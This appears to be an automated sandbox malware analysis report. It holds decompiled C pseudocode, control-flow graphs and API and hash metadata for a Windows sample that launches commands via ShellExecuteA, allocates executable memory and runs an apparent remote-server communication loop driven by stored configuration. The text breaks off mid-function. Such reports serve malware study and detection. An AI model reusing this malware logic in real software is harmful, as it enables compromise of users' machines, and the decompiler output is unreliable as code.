                                                                                control_flow_graph 786 406dc2-406dd5 787 406e33-406e35 786->787 788 406dd7-406df1 call 406cc9 call 40ef00 786->788 793 406df4-406df9 788->793 793->793 794 406dfb-406e00 793->794 795 406e02-406e22 GetVolumeInformationA 794->795 796 406e24 794->796 795->796 797 406e2e 795->797 796->797 797->787
                                                                                C-Code - Quality: 100%
                                                                                			E00406DC2(void* __ecx) {
				char _v261;
				char _v264;
				intOrPtr _t6;
				intOrPtr* _t10;
				int _t13;
				intOrPtr _t20;
				void* _t21;

				_t6 =  *0x412f0c;
				if(_t6 == 0) {
					E0040EF00( &_v264, E00406CC9(__ecx));
					_t10 =  &_v264;
					_t21 = _t10 + 1;
					do {
						_t20 =  *_t10;
						_t10 = _t10 + 1;
					} while (_t20 != 0);
					if(_t10 - _t21 < 3) {
						L5:
						 *0x412f0c = 0x61616161;
					} else {
						_v261 = 0;
						_t13 = GetVolumeInformationA( &_v264, 0, 0, "\xef\xbf\xbd\%}", 0, 0, 0, 0); // 						if(_t13 == 0) {
							goto L5;
						}
					}
					_t6 =  *0x412f0c;
				}
				return _t6;
			}










                                                                                0x00406dc5
                                                                                0x00406dd5
                                                                                0x00406de4
                                                                                0x00406dea
                                                                                0x00406df1
                                                                                0x00406df4
                                                                                0x00406df4
                                                                                0x00406df6
                                                                                0x00406df7
                                                                                0x00406e00
                                                                                0x00406e24
                                                                                0x00406e24
                                                                                0x00406e02
                                                                                0x00406e14
                                                                                0x00406e1a
                                                                                0x00406e22
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e22
                                                                                0x00406e2e
                                                                                0x00406e2e
                                                                                0x00406e35

                                                                                APIs
                                                                                  • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                  • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                  • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                  • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                • String ID: \%}
                                                                                • API String ID: 1823874839-2294156228
                                                                                • Opcode ID: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
                                                                                • Instruction ID: 46d685041afc82653286dae93d5fe3173771f16ecf38a4b71df535c97c95e6ed
                                                                                • Opcode Fuzzy Hash: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
                                                                                • Instruction Fuzzy Hash: 55F028B9104218AFD710DB68DDC5ED777ADD704308F008476E242E3141D6B89D984B5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004091EB Relevance: 3.1, APIs: 2, Instructions: 119sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 798 4091eb-409208 799 409308 798->799 800 40920e-40921c call 40ed03 798->800 802 40930b-40930f 799->802 804 40921e-40922c call 40ed03 800->804 805 40923f-409249 800->805 804->805 812 40922e-409230 804->812 806 409250-409270 call 40ee08 805->806 807 40924b 805->807 813 409272-40927f 806->813 814 4092dd-4092e1 806->814 807->806 815 409233-409238 812->815 816 409281-409285 813->816 817 40929b-40929e 813->817 818 4092e3-4092e5 814->818 819 4092e7-4092e8 814->819 815->815 820 40923a-40923c 815->820 816->816 821 409287 816->821 823 4092a0 817->823 824 40928e-409293 817->824 818->819 822 4092ea-4092ef 818->822 819->814 820->805 821->817 827 4092f1-4092f6 Sleep 822->827 828 4092fc-409302 822->828 829 4092a8-4092ab 823->829 825 409295-409298 824->825 826 409289-40928c 824->826 825->829 832 40929a 825->832 826->824 826->832 827->828 828->799 828->800 830 4092a2-4092a5 829->830 831 4092ad-4092b0 829->831 833 4092b2 830->833 835 4092a7 830->835 831->833 834 4092bd 831->834 832->817 836 4092b5-4092b9 833->836 837 4092bf-4092db ShellExecuteA 834->837 835->829 836->836 838 4092bb 836->838 837->814 839 409310-409324 837->839 838->837 839->802
                                                                                C-Code - Quality: 100%
                                                                                			E004091EB(char* _a4, char* _a8) {
				signed int _v8;
				signed int _v12;
				char _v524;
				char _t24;
				char* _t25;
				void* _t27;
				intOrPtr* _t29;
				char* _t31;
				char _t34;
				intOrPtr _t40;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t45;
				void* _t46;

				_v12 = _v12 & 0x00000000;
				_t42 = _a8;
				_v8 = 0x10;
				if( *_t42 == 0) {
					L33:
					return _v12;
				} else {
					goto L1;
				}
				do {
					L1:
					_t31 = E0040ED03(_t42, 0xd);
					if(_t31 != 0) {
						L6:
						_t44 = _t31 - _t42;
						if(_t44 >= 0x200) {
							_t44 = 0x1ff;
						}
						E0040EE08( &_v524, _t42, _t44);
						_t46 = _t46 + 0xc;
						 *((char*)(_t45 + _t44 - 0x208)) = 0;
						if(_v524 == 0) {
							goto L27;
						} else {
							_t25 =  &_v524;
							if(_v524 != 0x20) {
								L16:
								while( *_t25 == 0x22) {
									while(1) {
										_t25 =  &(_t25[1]);
										_t34 =  *_t25;
										if(_t34 == 0) {
											break;
										}
										if(_t34 == 0x22) {
											L15:
											_t25 =  &(_t25[1]);
											goto L16;
										}
									}
									if(_t34 != 0x22) {
										L20:
										while( *_t25 != 0) {
											if( *_t25 == 0x20) {
												L22:
												 *_t25 = 0;
												do {
													_t25 =  &(_t25[1]);
												} while ( *_t25 == 0x20);
												L26:
												_t27 = ShellExecuteA(0, _a4,  &_v524, _t25, 0, 0); // executed
												_v12 = _t27;
												if(_t27 != 0x2a) {
													 *0x412180 = _v8 | 0x61040100;
													 *0x41217c = _t27;
													return _t27;
												} else {
													goto L27;
												}
												while(1) {
													L27:
													_t24 =  *_t31;
													if(_t24 != 0xd && _t24 != 0xa) {
														goto L30;
													}
													_t31 = _t31 + 1;
												}
												goto L30;
											}
											_t25 =  &(_t25[1]);
										}
										if( *_t25 != 0x20) {
											_t25 = 0;
											goto L26;
										}
										goto L22;
									}
									goto L15;
								}
								goto L20;
							} else {
								goto L10;
							}
							do {
								L10:
								_t25 =  &(_t25[1]);
							} while ( *_t25 == 0x20);
							goto L16;
						}
					}
					_t31 = E0040ED03(_t42, 0xa);
					if(_t31 != 0) {
						goto L6;
					}
					_t29 = _t42;
					_t5 = _t29 + 1; // 0x409689
					_t41 = _t5;
					do {
						_t40 =  *_t29;
						_t29 = _t29 + 1;
					} while (_t40 != 0);
					_t31 = _t29 - _t41 + _t42;
					goto L6;
					L30:
					_t42 = _t31;
					if( *_t31 != 0) {
						Sleep(0x1f4); // executed
					}
					_v8 = _v8 + 1;
				} while ( *_t31 != 0);
				goto L33;
			}


















                                                                                0x004091f4
                                                                                0x004091fb
                                                                                0x00409201
                                                                                0x00409208
                                                                                0x00409308
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040920e
                                                                                0x0040920e
                                                                                0x00409216
                                                                                0x0040921c
                                                                                0x0040923f
                                                                                0x00409241
                                                                                0x00409249
                                                                                0x0040924b
                                                                                0x0040924b
                                                                                0x00409259
                                                                                0x0040925e
                                                                                0x00409261
                                                                                0x00409270
                                                                                0x00000000
                                                                                0x00409272
                                                                                0x00409279
                                                                                0x0040927f
                                                                                0x00000000
                                                                                0x0040929b
                                                                                0x0040928e
                                                                                0x0040928e
                                                                                0x0040928f
                                                                                0x00409293
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040928c
                                                                                0x0040929a
                                                                                0x0040929a
                                                                                0x00000000
                                                                                0x0040929a
                                                                                0x0040928c
                                                                                0x00409298
                                                                                0x00000000
                                                                                0x004092a8
                                                                                0x004092a5
                                                                                0x004092b2
                                                                                0x004092b2
                                                                                0x004092b5
                                                                                0x004092b5
                                                                                0x004092b6
                                                                                0x004092bf
                                                                                0x004092cf
                                                                                0x004092d5
                                                                                0x004092db
                                                                                0x00409319
                                                                                0x0040931f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004092dd
                                                                                0x004092dd
                                                                                0x004092dd
                                                                                0x004092e1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004092e7
                                                                                0x004092e7
                                                                                0x00000000
                                                                                0x004092dd
                                                                                0x004092a7
                                                                                0x004092a7
                                                                                0x004092b0
                                                                                0x004092bd
                                                                                0x00000000
                                                                                0x004092bd
                                                                                0x00000000
                                                                                0x004092b0
                                                                                0x00000000
                                                                                0x00409298
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409281
                                                                                0x00409281
                                                                                0x00409281
                                                                                0x00409282
                                                                                0x00000000
                                                                                0x00409287
                                                                                0x00409270
                                                                                0x00409226
                                                                                0x0040922c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040922e
                                                                                0x00409230
                                                                                0x00409230
                                                                                0x00409233
                                                                                0x00409233
                                                                                0x00409235
                                                                                0x00409236
                                                                                0x0040923c
                                                                                0x00000000
                                                                                0x004092ea
                                                                                0x004092ed
                                                                                0x004092ef
                                                                                0x004092f6
                                                                                0x004092f6
                                                                                0x004092fc
                                                                                0x004092ff
                                                                                0x00000000

                                                                                APIs
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000023,00000000,00000000), ref: 004092CF
                                                                                • Sleep.KERNELBASE(000001F4,00000000,00000000,000000C8), ref: 004092F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShellSleep
                                                                                • String ID:
                                                                                • API String ID: 4194306370-0
                                                                                • Opcode ID: 2e9b8ee1aa82e5b19222b1e7c8dec86c7ad71102b6cc4d34520be7bdbd19ecb4
                                                                                • Instruction ID: b62c5ac478237f1abe85933658217c67db4fb14a75668cd30a6e7fb188506a69
                                                                                • Opcode Fuzzy Hash: 2e9b8ee1aa82e5b19222b1e7c8dec86c7ad71102b6cc4d34520be7bdbd19ecb4
                                                                                • Instruction Fuzzy Hash: 0E41EE718083497EEB269664988C7E73BA49B52300F2809FFD492B72D3D7BC4D818759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02080E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 853 2080e0f-2080e24 SetErrorMode * 2 854 2080e2b-2080e2c 853->854 855 2080e26 853->855 855->854
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,02080223,?,?), ref: 02080E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,02080223,?,?), ref: 02080E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: 0594162c44c975425590a9f4248303b472abad866a18c321087184769bf3c7dc
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: 20D0123214522877D7413A94DC09BCE7B5CDF05B66F008011FB0DD9080C770954046E5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02080920 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02080929
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessTerminate
                                                                                • String ID:
                                                                                • API String ID: 560597551-0
                                                                                • Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                • Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
                                                                                • Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                • Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007B9B63 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007B9BB4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, Offset: 007B6000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7b6000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction ID: db4228a9ad10232db7fe455e9dc0af27eab818122aa5c1ae4400571a5ebbf1c1
                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction Fuzzy Hash: A0113C79A00208EFDB01DF98C985E99BBF5AF08751F058094FA589B362D375EA50DF81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 0040C913 Relevance: 113.4, APIs: 45, Strings: 19, Instructions: 1397filestringprocessCOMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E0040C913() {
				CHAR* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				signed int _v17;
				signed int _v24;
				signed int _v35;
				CHAR* _v39;
				signed int _v52;
				long _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				signed int _v72;
				signed int _v76;
				char _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				struct _PROCESS_INFORMATION _v120;
				char _v408;
				struct _PROCESS_INFORMATION _v424;
				char _v440;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v508;
				intOrPtr _v512;
				char _v640;
				intOrPtr _v688;
				intOrPtr _v720;
				intOrPtr _v728;
				intOrPtr _v732;
				CHAR* _v736;
				char _v740;
				struct _STARTUPINFOA _v808;
				struct _STARTUPINFOA _v876;
				char _v1176;
				void* __ebp;
				intOrPtr _t362;
				intOrPtr _t368;
				void* _t369;
				signed int _t388;
				signed int _t392;
				signed int _t395;
				signed int _t398;
				CHAR* _t403;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed int _t416;
				void* _t417;
				CHAR* _t418;
				signed int _t421;
				CHAR* _t428;
				signed int _t429;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t449;
				signed int _t453;
				signed int _t456;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t467;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t479;
				CHAR* _t483;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				signed int _t491;
				CHAR* _t492;
				long _t494;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				char* _t502;
				intOrPtr* _t513;
				signed int _t514;
				signed int _t527;
				signed int _t541;
				signed int _t545;
				signed int _t552;
				intOrPtr* _t559;
				signed int _t560;
				signed int _t571;
				signed int _t575;
				signed int _t579;
				signed int _t583;
				signed int _t588;
				signed char _t590;
				signed int _t591;
				intOrPtr* _t595;
				signed int _t596;
				signed int _t599;
				void* _t602;
				intOrPtr* _t607;
				char* _t609;
				CHAR* _t613;
				intOrPtr _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t621;
				signed int _t624;
				CHAR* _t630;
				void* _t632;
				signed int _t634;
				CHAR* _t636;
				void* _t642;
				signed int _t644;
				void* _t651;
				int _t657;
				int _t673;
				signed int _t681;
				CHAR* _t686;
				intOrPtr _t688;
				void* _t695;
				signed int _t705;
				signed int _t709;
				signed int _t711;
				signed int _t712;
				signed int _t723;
				char* _t726;
				char _t733;
				char _t734;
				char* _t736;
				void* _t738;
				signed int _t747;
				signed int _t748;
				signed int _t758;
				signed int _t760;
				void* _t763;
				signed int _t764;
				signed int _t765;
				void* _t766;
				void* _t768;
				void* _t769;
				long _t770;
				void* _t773;
				void* _t774;
				void* _t775;
				intOrPtr* _t776;
				intOrPtr* _t777;
				void* _t779;
				void* _t781;
				void* _t782;
				signed int _t789;
				signed int _t791;
				signed int _t793;
				signed int _t795;
				CHAR* _t796;
				CHAR* _t797;
				signed int* _t798;
				signed int _t801;
				long _t803;
				signed int _t805;
				void* _t806;
				void* _t807;
				void* _t808;
				void* _t809;
				void* _t811;

				_v64 = 0;
				_v68 = 0;
				if( *0x41366c == 0 ||  *0x413670 == 0) {
					E0040C517();
				}
				if( *0x41366c == 0 ||  *0x413670 == 0) {
					L21:
					__eflags = 0;
					return 0;
				} else {
					 *0x412104 = E0040E819(1, "time_cfg", "wtm_c", 0x14);
					 *0x41210c = E0040E819(1, "time_cfg", "wtm_w", 0x28);
					_t362 = E0040E819(1, "time_cfg", "wtm_r", 0x28);
					_t808 = _t807 + 0x30;
					 *0x412108 = _t362;
					if( *0x4136b0 != 0) {
						L7:
						_t747 =  *0x413674;
						_t688 =  *0x41366c;
						_v12 = 0;
						if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) != 0) {
							L11:
							_t748 = _t747 * 0x45;
							_t365 = _t748 + _t688;
							_t689 =  *((intOrPtr*)(_t748 + _t688 + 0x41));
							if( *((intOrPtr*)(_t748 + _t688 + 0x41)) == 0) {
								goto L21;
							}
							_t368 = E0040F428(E00402684(_t365 + 1), _t689);
							_v16 = _t368;
							_t829 = _t368;
							if(_t368 > 0) {
								_t369 = E0040F43E(_t368,  &_v640, 0xc8, 0);
								_t809 = _t808 + 0x10;
								__eflags = _t369 - 0xc8;
								if(__eflags == 0) {
									E00408F53( &_v640, 0xc8);
									__eflags = _v500 - 0xff;
									_pop(_t695);
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v512 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v508 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									 *0x413684 = 1;
									 *0x413678 = 0;
									 *0x41367c = 0;
									E0040EA84(1, "localcfg", "ip", _v496);
									_v104 = E0040F04E(0);
									_v100 = _t748;
									E0040EA84(1, "localcfg", "srv_time", _v492);
									E0040EA84(1, "localcfg", "local_time", _v104);
									E00408FB6( &_v440,  &_v640);
									E00408FB6( &_v92,  &_v640);
									E0040EE2A(_t695,  &_v740, 0, 0x64);
									_v728 = 1;
									_v688 = 0x100007f;
									_v732 = 1;
									_v720 = 0x1f;
									_v736 = 0;
									_v39 = 0x37;
									_t388 = E0040C65C(_v16,  &_v640,  &_v92, 0x412118, 0x64,  &_v52);
									_t811 = _t809 + 0x68;
									__eflags = _t388;
									if(_t388 > 0) {
										 *0x412148 = 0;
										 *0x41215a = 0;
										while(1) {
											L24:
											_t757 = _v16;
											_t392 = E0040C75D(_v16,  &_v640,  &_v440,  *0x4136b0, 0x100000,  &_v52);
											_t811 = _t811 + 0x18;
											__eflags = _t392 - 0xfffffffe;
											if(_t392 == 0xfffffffe) {
												break;
											}
											__eflags = _t392;
											if(_t392 < 0) {
												continue;
											}
											_t395 = _v39;
											__eflags = _t395;
											if(_t395 == 0) {
												_t789 = 1;
												__eflags = 1;
												do {
													_t398 = 1 << _t789;
													__eflags = _v35 & _t398;
													if((_v35 & _t398) != 0) {
														__eflags =  *(_t789 + 0x41215c);
														if( *(_t789 + 0x41215c) == 0) {
															__eflags = _t789 - 3;
															if(_t789 != 3) {
																E0040F1ED(_t789,  &_v96, 0xa);
																E0040E654(E00408C51, 5,  &_v96);
																_t811 = _t811 + 0x18;
															}
														}
													}
													_t789 = _t789 + 1;
													__eflags = _t789 - 0x20;
												} while (_t789 < 0x20);
												continue;
											}
											__eflags = _t395 - 1;
											if(_t395 == 1) {
												_t403 =  *0x4136b0;
												_t697 =  *_t403;
												_v24 = _t697;
												_t748 = _t403[4];
												_v76 = _t748;
												__eflags = _t697 & 0x00000018;
												if((_t697 & 0x00000018) == 0) {
													L177:
													__eflags = _v24 & 0x00000001;
													if((_v24 & 0x00000001) == 0) {
														L179:
														__eflags = _v24 & 0x00000004;
														if((_v24 & 0x00000004) == 0) {
															L182:
															__eflags = _v24 & 0x00000040;
															if((_v24 & 0x00000040) == 0) {
																L186:
																__eflags = _v24 & 0x00000080;
																if((_v24 & 0x00000080) == 0) {
																	L199:
																	__eflags = _v24 & 0x00000100;
																	if((_v24 & 0x00000100) == 0) {
																		L204:
																		__eflags = _v24 & 0x00000400;
																		if((_v24 & 0x00000400) == 0) {
																			L215:
																			_v8 = 0;
																			while(1) {
																				__eflags = _v64;
																				if(_v64 != 0) {
																					goto L228;
																				}
																				_t328 =  &(_v8[0x413300]); // 0x6e0020bc
																				_t758 =  *_t328;
																				__eflags = _t758;
																				if(_t758 == 0) {
																					L225:
																					_v8 =  &(_v8[4]);
																					__eflags = _v8 - 0x80;
																					if(_v8 < 0x80) {
																						continue;
																					}
																					__eflags = _v64;
																					if(_v64 != 0) {
																						goto L228;
																					}
																					_v39 = 0;
																					_t408 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, 0,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t408;
																					if(_t408 > 0) {
																						goto L24;
																					}
																					goto L228;
																				}
																				_t409 =  *(_t758 + 0x4c);
																				__eflags = _t409;
																				if(_t409 == 0) {
																					goto L225;
																				}
																				_t410 =  *_t409( &_v76,  &_v39,  *0x4136b0, 0x100000);
																				while(1) {
																					_t811 = _t811 + 0x10;
																					_v52 = _t410;
																					__eflags = _t410;
																					if(_t410 <= 0) {
																						break;
																					}
																					_t413 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _t410,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t413;
																					if(_t413 <= 0) {
																						_v64 = 1;
																						goto L225;
																					}
																					_t410 =  *(_t758 + 0x4c)( &_v76,  &_v39,  *0x4136b0, 0x100000);
																				}
																				goto L225;
																			}
																			break;
																		}
																		_t416 = E00407DD6(_t748);
																		__eflags = _t416;
																		if(_t416 != 0) {
																			goto L215;
																		}
																		_t417 = E0040F04E(0);
																		__eflags =  *0x4136ac - _t748;
																		if(__eflags > 0) {
																			goto L215;
																		}
																		if(__eflags < 0) {
																			L209:
																			__eflags =  *0x4121a8; // 0x0
																			if(__eflags == 0) {
																				goto L215;
																			}
																			__eflags =  *0x4121a4; // 0x0
																			if(__eflags != 0) {
																				L214:
																				_t418 =  *0x4136b0;
																				 *_t418 = 0;
																				_t733 =  *0x4121a4; // 0x0
																				_t418[4] = _t733;
																				_t734 =  *0x4122d4; // 0x0
																				_t418[8] = _t734;
																				_v39 = 0x34;
																				_t421 = E0040C65C(_v16,  &_v640,  &_v92, _t418, 0xc,  &_v52);
																				_t811 = _t811 + 0x18;
																				__eflags = _t421;
																				if(_t421 <= 0) {
																					break;
																				}
																				goto L215;
																			}
																			_t791 = E0040675C(0x4121a8,  &_v72, 0);
																			_t811 = _t811 + 0xc;
																			__eflags = _t791;
																			if(_t791 != 0) {
																				 *0x4122d4 = E004024C2(_t791, _v72, 0);
																				 *0x4121a4 = _v72;
																				E0040EC2E(_t791);
																				_t811 = _t811 + 0x10;
																			}
																			__eflags =  *0x4121a4; // 0x0
																			if(__eflags == 0) {
																				goto L215;
																			} else {
																				goto L214;
																			}
																		}
																		__eflags =  *0x4136a8 - _t417;
																		if( *0x4136a8 > _t417) {
																			goto L215;
																		}
																		goto L209;
																	}
																	E0040E854(1, "localcfg", "except_info",  *0x4136b0, 0x100000, 0x410264);
																	_t428 =  *0x4136b0;
																	_t811 = _t811 + 0x18;
																	_t736 =  &(_t428[1]);
																	do {
																		_t748 =  *_t428;
																		_t428 =  &(_t428[1]);
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_t429 = _t428 - _t736;
																	_v12 = _t429;
																	__eflags = _t429;
																	if(_t429 <= 0) {
																		goto L204;
																	}
																	E0040E8A1(_t748, 1, "localcfg", "except_info", 0x410264);
																	_v39 = 0xf;
																	_t434 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _v12,  &_v52);
																	_t811 = _t811 + 0x28;
																	__eflags = _t434;
																	if(_t434 <= 0) {
																		break;
																	}
																	goto L204;
																}
																_t760 = 0;
																__eflags =  *0x412184; // 0x0
																if(__eflags != 0) {
																	E00406F5F( &_v408, 0x120);
																	_t449 =  *0x412130; // 0x0
																	_push(0x412184);
																	asm("sbb eax, eax");
																	_push( &_v408);
																	_t453 = ( ~(_t449 & 0x00000600) & 0x00000020) + 0x20;
																	__eflags = _t453;
																	_push(_t453);
																	_push( *0x412159 & 0x000000ff);
																	_push( *0x412134);
																	_push( *0x412120);
																	_t456 = wsprintfA( *0x4136b0, E00402544("PromptOnSecureDesktop", 0x410fa0, 0x27, 0xe4, 0xc8));
																	_t811 = _t811 + 0x34;
																	_t760 = _t456;
																}
																_t793 =  *0x4122d8; // 0x0
																__eflags = _t793;
																if(_t793 == 0) {
																	L193:
																	__eflags = _t760;
																	if(_t760 == 0) {
																		goto L199;
																	}
																	_v39 = 0xb;
																	_t438 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _t760,  &_v52);
																	_t811 = _t811 + 0x18;
																	__eflags = _t438;
																	if(_t438 <= 0) {
																		break;
																	}
																	__eflags =  *0x412184; // 0x0
																	if(__eflags != 0) {
																		 *0x412184 = 0;
																	}
																	_t439 =  *0x4122d8; // 0x0
																	__eflags = _t439;
																	if(_t439 != 0) {
																		E0040EC2E(_t439);
																		 *0x4122d8 = 0;
																	}
																	goto L199;
																} else {
																	_t441 = _t793;
																	_t293 = _t441 + 1; // 0x1
																	_t738 = _t293;
																	do {
																		_t748 =  *_t441;
																		_t441 = _t441 + 1;
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_v60 = _t441 - _t738;
																	E0040EE08( &(( *0x4136b0)[_t760]), _t793, _t441 - _t738 + 1);
																	_t811 = _t811 + 0xc;
																	_t760 =  &(_v60[_t760]);
																	__eflags = _t760;
																	goto L193;
																}
															}
															while(1) {
																_t459 = E0040C06C( &_v24,  &_v39,  *0x4136b0, 0x100000);
																_t811 = _t811 + 0x10;
																__eflags = _t459;
																if(_t459 == 0) {
																	goto L186;
																}
																_t462 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t459,  &_v52);
																_t811 = _t811 + 0x18;
																__eflags = _t462;
																if(_t462 <= 0) {
																	goto L228;
																}
															}
															goto L186;
														}
														_push(0x71c7);
														_push( *0x4136b0);
														_t463 = E0040E7B4();
														__eflags = _t463;
														if(_t463 <= 0) {
															goto L182;
														}
														_v39 = 2;
														_t467 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t463 * 0x24,  &_v52);
														_t811 = _t811 + 0x18;
														__eflags = _t467;
														if(_t467 <= 0) {
															break;
														}
														goto L182;
													}
													E00403A00(_t697,  *0x4136b0);
													_v39 = 3;
													_t472 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, 0x28,  &_v52);
													_t811 = _t811 + 0x1c;
													__eflags = _t472;
													if(_t472 <= 0) {
														break;
													}
													goto L179;
												}
												_push(_t697);
												_push(0x100000);
												_push(_t403);
												while(1) {
													_t473 = E00403C09(_t748);
													_t811 = _t811 + 0xc;
													__eflags = _t473;
													if(_t473 == 0) {
														goto L177;
													}
													_t697 =  &_v52;
													_v39 = 4;
													_t476 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t473,  &_v52);
													_t811 = _t811 + 0x18;
													__eflags = _t476;
													if(_t476 <= 0) {
														goto L228;
													}
													_t478 = _v24 & 0x00000010;
													__eflags = _t478;
													_push(_t478);
													_push(0x100000);
